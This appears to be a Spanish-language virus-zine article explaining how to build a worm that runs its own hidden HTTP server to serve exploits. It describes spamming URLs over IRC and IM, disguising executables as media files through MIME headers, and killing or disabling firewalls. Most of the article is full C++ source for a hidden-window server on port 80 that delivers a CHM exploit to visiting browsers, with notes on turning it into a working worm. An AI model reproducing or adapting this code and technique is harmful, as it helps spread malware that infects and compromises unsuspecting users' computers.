﻿
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"><style type="text/css">
<!--
body,td,th {
	color: #FFFFFF;
}
body {
	background-color: #000000;
	SCROLLBAR-FACE-COLOR: #000000; 
	SCROLLBAR-HIGHLIGHT-COLOR: #0080c0; 
	SCROLLBAR-SHADOW-COLOR: #0080c0; 
	SCROLLBAR-3DLIGHT-COLOR: #000000; 
	SCROLLBAR-ARROW-COLOR: #c0c0c0; 
	SCROLLBAR-TRACK-COLOR: #000000; 
	SCROLLBAR-DARKSHADOW-COLOR: #000000

}
.style55 {font-family: "Courier New", Courier, monospace; font-size: 12px; }
.style62 {
	font-family: "Courier New", Courier, monospace;
	font-size: 14px;
	color: #0066CC;
	font-weight: bold;
	font-style: italic;
}
.style63 {font-family: "Courier New", Courier, monospace; font-size: 14px; color: #f88204; font-weight: bold; }
.style66 {color: #CCCCCC}
.Estilo4 {font-size: 14px; color: #FFFFFF; }
.Estilo5 {font-size: 18px; color: #FFFFFF; font-weight: bold; }
.Estilo6 {font-size: 14px; color: #00FF00; font-weight: bold; }
.Estilo8 {color: #0066FF}
.Estilo16 {font-size: 14px; color: #FFFFFF; font-weight: bold; }
.style97 {font-family: "Courier New", Courier, monospace; font-size: 12px; font-style: italic; }
.style99 {font-family: "Courier New", Courier, monospace; font-size: 12px; color: #999999; }
.style100 {font-family: "Courier New", Courier, monospace; font-size: 12px; font-style: italic; color: #00FF00; }
.style101 {color: #00FF00}
.style103 {font-family: "Courier New", Courier, monospace; font-size: 12px; color: #FF0000; }


-->

</style>
</head>

<body>

  <div align="left">
<p><span class="style55"><img src="../0x01.png" width="585" height="107"><bR>
      <span class="style66">#Worms con motores de mini servidor HTTP</span><br>
    #Autor: <strong>MachineDramon</strong></span><br>
    <span class="style103">#Este articulo contiene un source</span><br>
    </p>
  </div>
  <div align="left">
    <p align="justify" class="style55">Una buena forma de propagar un virus por irc o por IM es hacerlos mandando<br>
    spam para que se visite una url, por ejemplo:</p>
    <p align="justify" class="style100"> http://www.server.com/virus.htm</p>
    <p align="justify" class="style55">Uno de los principales problemas al hacer esto dependiendo del tipo de
    exploit que se fuera a utilizar, es buscar server gratuitos que<br>
    dejen subir determinados tipos de archivos, por ejemplo para el bug del
    chm hay que buscar servers que dejen subir archivos .chm, para el del
    objectdata habia que buscar server que soporten asp, php, o jsp para enviar
    la cabecera http necesaria, etc. Ademas de que si el virus alcanza cierta
    propagacion, el server es avisado y nos cierra el sitio. Tambien es un poco
    inseguro, porque muchos servers guardan la ip del que se registro.</p>
    <p align="justify" class="style55">Por eso seria mejor que el virus comprobara la conex a internet, esperara
    a que haya conex, encontrara la ip publica de la pc, escuchara por el
    puerto 80 las peticiones http y sirviera los archivos necesarios.<br>
    Osea que actue como un MiniServer HTTP, algunas ventajas seria que
    podriamos mandar las cabeceras que quisieramos, no nos importaria el<br>
    tipo de archivo, y una cosa importante, podriamos hacer spam de urls:</p>
    <p align="justify" class="style97"> <span class="style101">http://ip/foto.jpg</span>  ó  <span class="style101">http://ip/video.mpg</span>  ó  <span class="style101">http://ip/musica.mp3</span></p>
    <p align="justify" class="style55">Y enviar en ves del jpg/mpg/mp3 un .exe o un exploit, porque nada
    nos obliga a enviar algo de acuerdo a la extencion, claro que
    tendriamos que enviar en la respuesta al navegador la cabecera que indique
    el tipo MIME de lo que estamos enviando, como IE se guia por los tipos
    MIME, IE nos puede pedir foto.jpg y nosotros enviarle foto.exe con la
    cabecera &quot;Content-Type: application/octet-stream&quot; y seria valido,
    no estoy diciendo que el .exe se ejecutaria, pero la transaccion http
    seria valida, pero mejor es enviar un exploit</p>
    <p align="justify" class="style55">Esto lo intente hacer el año pasado en vb, pero por mi impericia en el
    manejo de sockets, no salio como esperaba, ahora esta en c++, haber que
    tal funka. Si vamos hacer esto en vb, no es necesario crear la ventana
    podemos aprovechar la ventana del formulario subclasicandola.</p>
    <p align="justify" class="style55">En el code de ejemplo se verifica la conex a internet, averigua la ip de
    la pc, luego se crea una ventana para usar sockets en modo asincronico, se
    pone a escuchar el puerto 80 y por cada peticion HTTP GET se crea un hilo
    que sirve un exploit chm (exploit viejo, aunque todavia agarra gente). Asi
    como esta el code no sirve pa un worm porque muestra msgbox y no retiene la
    ip encontrada, ademas hay que ponerle un xploit nuevo, pero como idea me
    parece que sirve.</p>
    <p align="justify" class="style55">La dificultad de esto es que si la pc tiene instalado un firewall, tenemos
    que matarlo primero, porque sino no vamos a poder escuchar el puerto.
    Solucion matar el proceso, si el firewall es de esos que no se deja matar
    ponerlo pa ser borrado al siguiente reinicio(en 98 y xp como administrador
    funka esto, no creo en una cuenta limitada), si es el firewall de xp detener
    el servicio.</p>
    <p align="justify" class="style55">Al ver el code tal vez alguien diga que esto se puede hacer muy bien con 
    sockets en modo sincronico y tendria razon, tambien se puede.Aqui vemos un source de ejemplo</p>
    <p class="style99">#include &lt;windows.h&gt;<br>
  #include &lt;wininet.h&gt;<br>
  #include &lt;stdlib.h&gt;<br>
  #include &lt;stdio.h&gt;<br>
  #include &lt;string.h&gt;<br>
  #include &lt;time.h&gt;<br>
    //--------------------------------------------------------------------<br>
    LRESULT CALLBACK WindowProcedure (HWND, UINT, WPARAM, LPARAM);<br>
    DWORD WINAPI AceptSocket(void*param);<br>
    int ObtenerIP();<br>
    int CreaWindow();<br>
    int OpenServer();<br>
    int BucleMensajes();<br>
    //--------------------------------------------------------------------<br>
    HINSTANCE hInstance;<br>
    char *ip;<br>
    char szClassName[] = &quot;GEDZAC_LABS&quot;;<br>
    HWND hwnd;<br>
    SOCKET sk;<br>
    //mensaje personalizado que se enviara a la ventana cuando<br>
    //aya una conexcion entrante por el puerto 80<br>
    const unsigned int WM_GEDZAC = WM_USER + 123;<br>
    //--------------------------------------------------------------------<br>
    int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszArgument, int nFunsterStil)<br>
    {<br>
    //Iniciamos un Bucle para esperar a que haya conex a internet, si hay<br>
    //conex sale del bucle, sino espera 60seg y vuelve a comprobar la conex<br>
    while(1)<br>
    {<br>
    if (InternetGetConnectedState(0,0)) { break; } else { Sleep(60000); }<br>
    }</p>
    <p class="style99">//obtenemos la ip de la pc, en este code no se usa la ip, pero en un<br>
    //worm real que use esta tecnica, deberia hallar la ip, para enviar<br>
    //el spam del tipo http://ip/file</p>
    <p class="style99"> if (!ObtenerIP()) MessageBox(0,&quot;No se pudo Obtener Ip Publica&quot;,&quot;Msg&quot;,0);<br>
    <br>
    //igualamos hThisInstance(la instancia de la aplicacion, handle del modulo)<br>
    //a la var global hInstance, ya que necesitaremos este valor, fuera de<br>
    //Main<br>
    hInstance = hThisInstance;</p>
    <p class="style99">//Funcion que crea la ventana<br>
  if (!CreaWindow()) { MessageBox(0,&quot;No se pudo crear la ventana&quot;,&quot;Msg&quot;,0); }<br>
    else<br>
    {<br>
    //ponemos a escuchar el puerto 80<br>
    if(!OpenServer()) MessageBox(0,&quot;No se pudo abrir el puerto&quot;,&quot;Msg&quot;,0);<br>
    //vamos al bucle de mensajes de la aplicacion<br>
    BucleMensajes();<br>
    }</p>
    <p class="style99"> return 0;<br>
    }<br>
    //--------------------------------------------------------------------<br>
    int ObtenerIP()<br>
    {<br>
    //valor que devolvera la funcion<br>
    bool b=1;<br>
    //iniciamos una instancia del winsock, si error devuelve 0 <br>
    WSADATA wsa;<br>
    if (WSAStartup(MAKEWORD(1,1),&amp;wsa)) return 0;<br>
    int i=0;<br>
    //obtenemos el nombre del host, si error gethostname devuelve<br>
    //SOCKET_ERROR, igualamos b=0 y vamos a EndWinSock<br>
    //no hacemos un return directamente para salir de la funcion<br>
    //porque necesitamos cerrar la instancia de WinSock que iniciamos<br>
    //aunque se podria haber puesto: { WSACleanup(); return 0; }<br>
    //se opto por una etiqueta goto<br>
    char hostname[256];<br>
    if (gethostname(hostname,256)) { b=0; goto EndWinSock; }</p>
    <p class="style99">//con gethostbyname, obtenemos un puntero a una estrcutura HostEnt<br>
    //si error, devuelve un puntero nulo, e igualamos b=0 y vamos a EndWinSock<br>
    HOSTENT *hts;<br>
    if ((hts = gethostbyname(hostname))==NULL) { b=0; goto EndWinSock; }</p>
    <p class="style99">//declaramos una estructura IN_ADDR y asignamos 20 bytes al puntero <br>
    //*ip(que se declaro como global al principio de la aplicacion)<br>
    //si malloc devuelve un puntero nulo, error y b=0, vamos a EndWinSock<br>
    IN_ADDR addr;<br>
    if ((ip=(char *)malloc(20))==NULL) { b=0; goto EndWinSock; }</p>
    <p class="style99">//iniciamos un bucle, para enumerar el miembro h_addr_list de la<br>
    //estrcutura HostEnt, que contiene la lista de ips de la maquina,<br>
    //en caso de que haya una sola ip, si hay conex a internet sera<br>
    //la ip publica, sino sera la ip privada; si hay 2 ips, en las pruebas<br>
    //que he hecho la primera es la privada y la segunda la publica<br>
    //la que nos interesa es la publica, si siempre salen en ese orden<br>
    //no habria problema, ya que la ip publica seria la ultima que saliera,<br>
    //pero no puedo asegurar que siempre salgan en ese orden, aunque en 3<br>
    //pcs que he probado han salido asi. Cuando ya no haya mas ips<br>
    //h_addr_list sera nulo y saldremos del bucle.<br>
    //(thx a los contactos del msn, que me ayudaron a probar el programa <br>
    //con lo de las ips publicas y privadas)<br>
    while (hts-&gt;h_addr_list[i])<br>
    {<br>
    //asignamos la ip que contiene h_addr_list al miembro s_addr de<br>
    //la structura IN_ADDR, e incrementamos i<br>
    addr.s_addr=*((long*)hts-&gt;h_addr_list[i++]);<br>
    //en s_addr esta la ip en formato de red, pero como necesitamos<br>
    //la ip representada en una cadena del tipo xxx.xxx.xxx.xxx<br>
    //usamos inet_ntoa pasandole la structura IN_ADDR addr, y devuelve<br>
    //un puntero a la ip en forma de cadena<br>
    ip=inet_ntoa(addr);</p>
    <p class="style99"> }<br>
    //mostramos la ip <br>
    MessageBox(0,ip,&quot;IP&quot;,0); <br>
    //como en este code no se usa la ip, liberamos la memoria asignada<br>
    //al puntero *ip, en caso de un worm real, se deberia conservar la ip<br>
    free(ip);<br>
    <br>
    //etiqueta goto<br>
    EndWinSock:<br>
    //Terminamos secion en WinSock y devolvemos el valor de b, si hubo<br>
    //error b=0, sino b=1<br>
    WSACleanup();<br>
    return b;<br>
    }<br>
    //--------------------------------------------------------------------<br>
    int CreaWindow()<br>
    {<br>
    //Como vamos a usar sockets en forma asincronica, necesitamos una<br>
    //ventana.<br>
    //Declaramos struct WNDCLASSEX<br>
    WNDCLASSEX wincl;</p>
    <p class="style99"> wincl.cbSize = sizeof (WNDCLASSEX); /* Tamaño de la struct */<br>
    wincl.hInstance = hInstance;  /* Instancia de la aplicacion a la que pertenecera la ventana*/<br>
    wincl.lpszClassName = szClassName; /* Nombre de la clase*/<br>
    wincl.lpfnWndProc = WindowProcedure; /* Nombre de la funcion que manejara los msgs de la ventana */<br>
    wincl.style = CS_NOCLOSE; /* Stylos de la ventana, aunque creo que no es necesario, colocamos CS_NOCLOSE para que la ventana no se pueda cerrar */<br>
    wincl.hIcon = LoadIcon (NULL, IDI_APPLICATION); /* icono de la ventana, cargamos el por defecto */<br>
    wincl.hIconSm = LoadIcon (NULL, IDI_APPLICATION); /* icono pequeño de la ventana, cargamos el por defecto */<br>
    wincl.hCursor = LoadCursor (NULL, IDC_ARROW); /* cursor de la ventana, cargamos el por defecto */<br>
    wincl.lpszMenuName = NULL; /* Puntero a una cadena que hace referencia al nombre de un recurso del tipo MENU, usamos NULL*/<br>
    /* estos 2 asignan memoria extra, pero como no los usamos y no se bien pa que sirven, le ponemos 0 */<br>
    wincl.cbClsExtra = 0;<br>
    wincl.cbWndExtra = 0;<br>
    wincl.hbrBackground = (HBRUSH) COLOR_BACKGROUND; /* Color de fondo de la ventana */<br>
    //registramos la clase, si error RegisterClassEx devuelve 0 y salimos<br>
    if (!RegisterClassEx(&amp;wincl)) return 0;</p>
    <p class="style99"> hwnd = CreateWindowEx (<br>
    0,               /* stylos de la ventana */<br>
    szClassName,     /* nombre de la clase */<br>
&quot;GEDZAC&quot;,        /* titulo de ventana */<br>
    WS_OVERLAPPED,   /* mas stylos de la ventana, WS_OVERLAPPED: ventana de las más simples */<br>
    CW_USEDEFAULT,   /* posicion inicial de la ventana en x, CW_USEDEFAULT: windows decide donde la pone */<br>
    CW_USEDEFAULT,   /* posicion inicial de la ventana en y, CW_USEDEFAULT: windows decide donde la pone */<br>
    100,             /* ancho de la ventana */<br>
    100,             /* alto de la ventana */<br>
    HWND_DESKTOP,    /* handle de la ventana padre, indicamos que es hija del escritorio */<br>
    NULL,            /* handle al menu o handle de ventana hija*/<br>
    hInstance,       /* Instancia la aplicacion a la que pertenece la ventana */<br>
    // puntero a datos de creación de la ventana, puntero a un<br>
    // valor pasado a la ventana a través de la estructura <br>
    // CREATESTRUCT, ponemos NULL (osea que no tengo idea que hace esto)<br>
    NULL<br>
    );<br>
    //si exito CreateWindowEx devuelve el handle de la ventana creada<br>
    //sino devuelve 0 y salimos<br>
    if (!hwnd) return 0;<br>
    <br>
    //mostramos la ventana creada, pero como no queremos que el user<br>
    //ande viendo que tiene una ventanita rara en la pantalla la<br>
    //mostramos oculta (SW_HIDE)<br>
    ShowWindow (hwnd, SW_HIDE);<br>
    return 1;<br>
    }<br>
    //--------------------------------------------------------------------<br>
    int BucleMensajes()<br>
    {<br>
    //declaramos struct MSG<br>
    MSG messages;<br>
    //Iniciamos el bucle de mensajes de la ventana, GetMessage busca en<br>
    //la cola de mensajes, si no hay un msg, espera hasta que lo haya<br>
    //cuando hay uno regresa un valor diferente de 0 y llena la structura<br>
    //messages, entre lo que contiene la strcutura esta el handle de la <br>
    //ventana a quien va dirigido el mensaje, el tipo de mensaje, los<br>
    //datos del mensaje.<br>
    //Como segundo parametro de GetMessage va el handle de la ventana<br>
    //de la cual se quieren recibir los mensajes dirigidos a ella<br>
    //(si se quiere recibir los mensajes de todas las ventanas que perte-<br>
    // necen a este hilo de la aplicacion, poner 0), pero como en<br>
    //este caso solo nos interesa una sola ventana.<br>
    //El 3° y 4° parametro de GetMessage, son numeros que se puede usar<br>
    //como intervalos para filtrar ciertos mensajes, en este caso<br>
    //ponemos 0<br>
    //Si GetMessage recibe un mensaje WM_QUIT retorna 0 y se sale del<br>
    //bucle<br>
    while (GetMessage(&amp;messages, hwnd, 0, 0))<br>
    {<br>
    //traduce mensajes con teclas virtuales, en mensajes con caracteres<br>
    TranslateMessage(&amp;messages);<br>
    //envia los datos al procedimiento de ventana que procesara los<br>
    //mensajes.<br>
    DispatchMessage(&amp;messages);<br>
    }<br>
    return 1;<br>
    }<br>
    //--------------------------------------------------------------------<br>
    LRESULT CALLBACK WindowProcedure (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam)<br>
    {<br>
    //este es el procedimiento de ventana, que procesara los mensajes dirigidos<br>
    //a la ventana<br>
    <br>
    //un switch para distinguir los mensajes<br>
    switch (message)<br>
    {<br>
    DWORD TID;<br>
    <br>
    //si recibe un msg WM_DESTROY, PostQuitMessage envia un msg WM_QUIT<br>
    //a la cola de mensajes <br>
    case WM_DESTROY:<br>
    PostQuitMessage(0); break;</p>
    <p class="style99"> //si recibe el mensaje WM_GEDZAC inicia un hilo para servir los files<br>
    //iniciamos un hilo para poder contestar varias peticiones al mismo<br>
    //tiempo<br>
    case WM_GEDZAC:<br>
    CreateThread(0,0,AceptSocket,0,0,&amp;TID); break;<br>
    <br>
    //para todos los demas mensajes que no nos interesa procesar de forma<br>
    //personalizada, los enviamos al procedimiento de mensajes por defecto<br>
    //para que se encargue de ellos, usamos DefWindowProc pasando el<br>
    //handle de la ventana, el mensaje, y los datos del mensaje(wParam y lParam)<br>
    default:<br>
    return DefWindowProc (hwnd, message, wParam, lParam);<br>
    }<br>
    return 0;<br>
    }<br>
    //--------------------------------------------------------------------<br>
    int OpenServer()<br>
    {<br>
    //iniciamos secion en winsock<br>
    WSADATA wsa;<br>
    if (WSAStartup(MAKEWORD(1,1),&amp;wsa)) return 0;<br>
    <br>
    SOCKADDR_IN Ska;<br>
    //indicamos socket para internet<br>
    Ska.sin_family = AF_INET;<br>
    //indicamos puerto 80, htons para convertir el 80 a formato de red<br>
    Ska.sin_port = htons(80);<br>
    //aqui se pone la ip de la maquina local, usamos INADDR_ANY<br>
    //para que se calcule automaticamente la ip<br>
    Ska.sin_addr.s_addr = htonl(INADDR_ANY);</p>
    <p class="style99"> //creamos el socket, con opcion de que sea un socket para redes (internet),<br>
    //sea un socket de streams, y que trabaje con tcp/ip, si error<br>
    //devuelve INVALID_SOCKET (-1) y terminamos secion en winsock y salimos<br>
    if((sk=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET) { WSACleanup(); return 0; }</p>
    <p class="style99"> //bind asigna los datos de la estructura SOCKADDR_IN mdr al socket<br>
    //si error vamos a fin, se podria decir que asigna un puerto al<br>
    //socket, si error salimos<br>
    if (bind(sk, (struct sockaddr *)&amp;Ska, sizeof(Ska)) != 0) { WSACleanup(); return 0; }</p>
    <p class="style99"> //con WSAAsyncSelect ponemos el socket en modo asincronico, indicamos<br>
    //el socket(sk), el handle de la ventana a la que se enviaran los msgs<br>
    //el mensaje que se enviara a la ventana, y el evento ante el que se<br>
    //quiere recibir un msg, en este caso con FD_ACCEPT se recibira el<br>
    //mensaje personalizado WM_GEDZAC, cada vez que haya una conexion<br>
    //entrante por el puerto al que vamos a poner a escuchar.<br>
    //Si error salimos<br>
    if(WSAAsyncSelect(sk,hwnd,WM_GEDZAC,FD_ACCEPT)==SOCKET_ERROR) { WSACleanup(); return 0; }</p>
    <p class="style99"> //ponemos a escuchar el puerto, indicando el socket(sk) y el numero<br>
    //de conexiones que se aceptaran en la cola de espera.<br>
    //Si error salimos<br>
    if(listen(sk,20)==SOCKET_ERROR) { WSACleanup(); return 0; }</p>
    <p class="style99"> return 1; <br>
    }<br>
    //--------------------------------------------------------------------<br>
    //Cuando se reciba un msg WM_GEDZAC, se iniciara un hilo que ejecutara<br>
    //esta funcion, para servir los files<br>
    DWORD WINAPI AceptSocket(void*param)<br>
    {<br>
    //variables que serviran de buffers, para almacenar el contenido de los<br>
    //files que se van a servir<br>
    LPSTR HTM, CHM;<br>
    //variables que almacenaran los tamaños de los files a servir<br>
    DWORD HTMSz, CHMSz;</p>
    <p class="style99"> //leemos el file index.htm, almacenamos su contenido en un buffer<br>
    //y calculamos su tamaño <br>
    DWORD dw; <br>
    HANDLE Hh = CreateFile(&quot;C:\\index.htm&quot;, GENERIC_READ, FILE_SHARE_READ,0,OPEN_EXISTING,0,0);<br>
    if (Hh==INVALID_HANDLE_VALUE) return 0;<br>
    HTMSz = GetFileSize(Hh,0);<br>
    HTM = (LPSTR)GlobalAlloc(GPTR,HTMSz+1);<br>
    ReadFile(Hh,HTM,HTMSz,&amp;dw,0);<br>
    CloseHandle(Hh);</p>
    <p class="style99"> //igual con test.chm<br>
  HANDLE Hc = CreateFile(&quot;C:\\test.chm&quot;, GENERIC_READ, FILE_SHARE_READ,0,OPEN_EXISTING,0,0);<br>
    if (Hc==INVALID_HANDLE_VALUE) return 0;<br>
    CHMSz = GetFileSize(Hc,0);<br>
    CHM = (LPSTR)GlobalAlloc(GPTR,CHMSz+1);<br>
    ReadFile(Hc,CHM,CHMSz,&amp;dw,0);<br>
    CloseHandle(Hc);</p>
    <p class="style99"> SOCKADDR_IN Ska; SOCKET sck; int timeout=30000; char buffer[100];<br>
    <br>
    //aceptamos la conex entrante y accept nos regresa un nuevo<br>
    //descriptor de socket en sck<br>
    int size = sizeof(Ska);<br>
    sck = accept(sk,(struct sockaddr *)&amp;Ska, &amp;size);<br>
    <br>
    //si error salimos<br>
    if(sck==INVALID_SOCKET || sck==0) { return 0; }</p>
    <p class="style99"> //establecemos un timeout, tiempo de espera en el nuevo socket<br>
    //como este esta en modo sincronico no valla a ser que se nos<br>
    //quede colgado, el tiempo de espera se indica en milisegundos<br>
    //para la recepcion y envio de datos le damos 30 segundos<br>
    //esto hara que en operaciones recv y send, si no termina en ese<br>
    //tiempo, regresa error y sigue, el tiempo de espera se puede variar<br>
    //de acuerdo al tamaño de los datos a enviar, ya que a datos más<br>
    //grandes se necesitara más tiempo.<br>
    //Si error al establecer el tiempo de espera, cerramos el socket<br>
    //y salimos<br>
    if (setsockopt(sck, SOL_SOCKET, SO_RCVTIMEO,(char*) &amp;timeout, sizeof(timeout))==SOCKET_ERROR) { closesocket(sck); return 0; }<br>
    if (setsockopt(sck, SOL_SOCKET, SO_SNDTIMEO,(char*) &amp;timeout, sizeof(timeout))==SOCKET_ERROR) { closesocket(sck); return 0; }</p>
    <p class="style99"> //tratamos de leer la peticion HTTP GET que se supone debe haber<br>
    //enviado el navegador al conectarse, y almacenamos los 99 primeros<br>
    //bytes en buffer.<br>
    int x = recv(sck,buffer,sizeof(buffer)-1,0);<br>
    //pasamos buffer a mayusculas<br>
    strupr(buffer);<br>
    <br>
    //si error o si lo leido no contiene la palabra GET, cerramos el socket<br>
    //y salimos<br>
    if (x&lt;=0 || !strstr(buffer,&quot;GET&quot;)) { closesocket(sck); return 0; }</p>
    <p class="style99"> //construimos la cabecera HTTP que enviaremos al navegador en respuesta<br>
    char HEADER[500], szt[50];<br>
    //version http y codigo de estado (200=OK)<br>
    strcpy(HEADER,&quot;HTTP/1.1 200 OK\r\n&quot;);</p>
    <p class="style99"> //esto es para construir la cabecera Date, que segun veo los servers<br>
    //la envian en un formato: Date: Wed, 17 Set 2005 03:04:05 GMT<br>
    time_t lt;<br>
    SYSTEMTIME tms;<br>
    <br>
    GetSystemTime(&amp;tms);<br>
    lt = time(NULL);</p>
    <p class="style99"> char *tim = (char *)malloc(50);<br>
  tim=ctime(&amp;lt);<br>
  sprintf(szt, &quot;Date: %c%c%c, %u %c%c%c %u %u:%u:%u GMT\r\n&quot;,tim[0],tim[1],tim[2],tms.wDay,tim[4],tim[5],tim[6],tms.wYear,tms.wHour,tms.wMinute,tms.wSecond);<br>
    strcat(HEADER,szt);<br>
    free(tim);<br>
    //tipo y version de server<br>
    strcat(HEADER,&quot;Server: Apache/2.0\r\n&quot;);<br>
    <br>
    //como en este caso vamos a usar un exploit chm, en caso de que la<br>
    //peticion contenga la cadena chm, enviaremos el chm<br>
    if (!strstr(buffer,&quot;CHM&quot;))<br>
    {<br>
    //tipo mime del archivo que estamos enviando <br>
    strcat(HEADER,&quot;Content-Type: text/html\r\n&quot;);<br>
    //tamaño en bytes del archivo<br>
    sprintf(szt,&quot;Content-Length: %u\r\n\r\n&quot;,HTMSz);<br>
    strcat(HEADER, szt);<br>
    <br>
    //enviamos la cabecera, si error cerramos el socket y salimos<br>
    x = send(sck,HEADER,strlen(HEADER),0);<br>
    if (x&lt;=0) { closesocket(sck); return 0; }<br>
    //enviamos el contenido del archivo<br>
    send(sck,HTM,HTMSz,0);<br>
    }<br>
    else<br>
    {<br>
    //tipo mime del archivo que estamos enviando<br>
    strcat(HEADER,&quot;Content-Type: text/html\r\n&quot;);<br>
    //tamaño en bytes del archivo<br>
    sprintf(szt,&quot;Content-Length: %u\r\n\r\n&quot;,CHMSz);<br>
    strcat(HEADER, szt);</p>
    <p class="style99"> //enviamos la cabecera, si error cerramos el socket y salimos <br>
    x = send(sck,HEADER,strlen(HEADER),0);<br>
    if (x&lt;=0) { closesocket(sck); return 0; }<br>
    //enviamos el contenido del archivo <br>
    send(sck,CHM,CHMSz,0);<br>
    }</p>
    <p><span class="style99"> //esperamos 3seg y cerramos el socket y liberamos los buffers<br>
    Sleep(3000);<br>
    closesocket(sck);<br>
    GlobalFree(HTM); GlobalFree(CHM);<br>
    return 1;<br>
    }</span><br>
    </p>
    <p class="style55">&nbsp;</p>
    <p align="justify" class="style55">&nbsp;</p>
</div>
</body>
</html>
